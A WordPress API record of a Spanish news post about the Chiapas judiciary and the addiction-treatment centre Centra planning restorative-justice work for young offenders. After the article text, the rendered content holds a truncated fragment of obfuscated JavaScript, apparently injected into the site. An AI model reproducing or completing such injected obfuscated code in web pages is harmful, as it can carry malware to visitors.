{"id":1621,"date":"2022-04-26T23:55:24","date_gmt":"2022-04-26T23:55:24","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=1621"},"modified":"2022-04-26T23:55:25","modified_gmt":"2022-04-26T23:55:25","slug":"fortalece-poder-judicial-colaboracion-con-el-centra","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=1621","title":{"rendered":"Fortalece Poder Judicial colaboraci\u00f3n con el Centra"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"461\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-26-at-5.02.15-PM-1024x461.jpeg\" alt=\"\" class=\"wp-image-1622\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-26-at-5.02.15-PM-1024x461.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-26-at-5.02.15-PM-300x135.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-26-at-5.02.15-PM-768x346.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-26-at-5.02.15-PM-1536x691.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-26-at-5.02.15-PM.jpeg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>26 de Abril del.2022. Tuxtla Guti\u00e9rrez, Chiapas. &#8211; En seguimiento al Convenio Marco de Colaboraci\u00f3n Institucional signado en diciembre pasado entre el Poder Judicial del Estado, que encabeza Juan \u00d3scar Trinidad Palacios, y la Fiscal\u00eda General del Estado, a cargo de Olaf G\u00f3mez Hern\u00e1ndez, se realiz\u00f3 una reuni\u00f3n de trabajo con el Centro para la Prevenci\u00f3n y Tratamiento de Adicciones del Estado de Chiapas (Centra) y el Centro Estatal de Justicia Alternativa (CEJA) de esta casa de la justicia.Este ejercicio fue conducido por la directora del CEJA, Elisheba Goldhaber Pasillas, donde con la informaci\u00f3n proporcionada por la coordinadora del Centra, Liliana Iveth L\u00f3pez Gordillo, se logr\u00f3 el objetivo de desdoblar l\u00edneas de acci\u00f3n en atenci\u00f3n a las y los j\u00f3venes, para que en el \u00e1mbito de la Justicia Restaurativa puedan tener una integral reintegraci\u00f3n a la sociedad, impulsando los trabajos coordinados desde el Ejecutivo Estatal para el fortalecimiento de la protecci\u00f3n a grupos en situaci\u00f3n de vulnerabilidad y las pol\u00edticas de reinserci\u00f3n social en la entidad.Cabe se\u00f1alar que, con la implementaci\u00f3n de la Justicia Restaurativa, se trabaja una v\u00eda para celebrar un acuerdo reparatorio o un plan de reparaci\u00f3n, que parte de un acuerdo de voluntades entre la v\u00edctima u ofendido y el imputado, que se considera para la aprobaci\u00f3n de una suspensi\u00f3n condicional del proceso como soluci\u00f3n alterna.De ah\u00ed la relevancia de esta mesa de trabajo, en la que asimismo se trazaron estrategias y actividades que coadyuvar\u00e1n dentro de un marco legal y cooperaci\u00f3n institucional a garantizar la reparaci\u00f3n del da\u00f1o a la v\u00edctima y que la persona adolescente que cometi\u00f3 la infracci\u00f3n se responsabilice de sus acciones y se reintegre a la comunidad.Finalmente, se precisa que con este convenio de colaboraci\u00f3n entre el Poder Judicial y la Fiscal\u00eda General del Estado se busca beneficiar a la poblaci\u00f3n joven de Chiapas, en aras de fomentar la cultura de la paz.En el marco de esta junta de trabajo tambi\u00e9n participaron el subdirector regional Tuxtla, Rodrigo Dom\u00ednguez Moscoso; los facilitadores Fernhelly Su\u00e1rez P\u00e9rez y N\u00e9stor Eli Hern\u00e1ndez G\u00e1lvez; personal de Direcci\u00f3n, Jos\u00e9 Antonio Canseco P\u00e9rez, y el jefe de departamento del \u00c1rea Jur\u00eddica y del Programa de Justicia Terap\u00e9utica del Centra, Jaime S\u00e1nchez Tinajero.Direcci\u00f3n de Comunicaci\u00f3n Social y Relaciones P\u00fablicas61 7 87 00 Ext. 8020\/8021 f : \/poderjudicial.chiapas t : @PJE_Chiapas<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>26 de Abril del.2022. Tuxtla Guti\u00e9rrez, Chiapas. &#8211; En seguimiento al Convenio Marco de Colaboraci\u00f3n Institucional signado en diciembre pasado entre el Poder Judicial del Estado, que encabeza Juan \u00d3scar Trinidad Palacios, y la Fiscal\u00eda General del Estado, a cargo de Olaf G\u00f3mez Hern\u00e1ndez, se realiz\u00f3 una reuni\u00f3n de trabajo con el Centro para la &hellip;<\/p>\n","protected":false},"author":2,"featured_media":1622,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-1621","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1621","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1621"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1621\/revisions"}],"predecessor-version":[{"id":1623,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1621\/revisions\/1623"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/1622"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1621"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1621"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1621"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}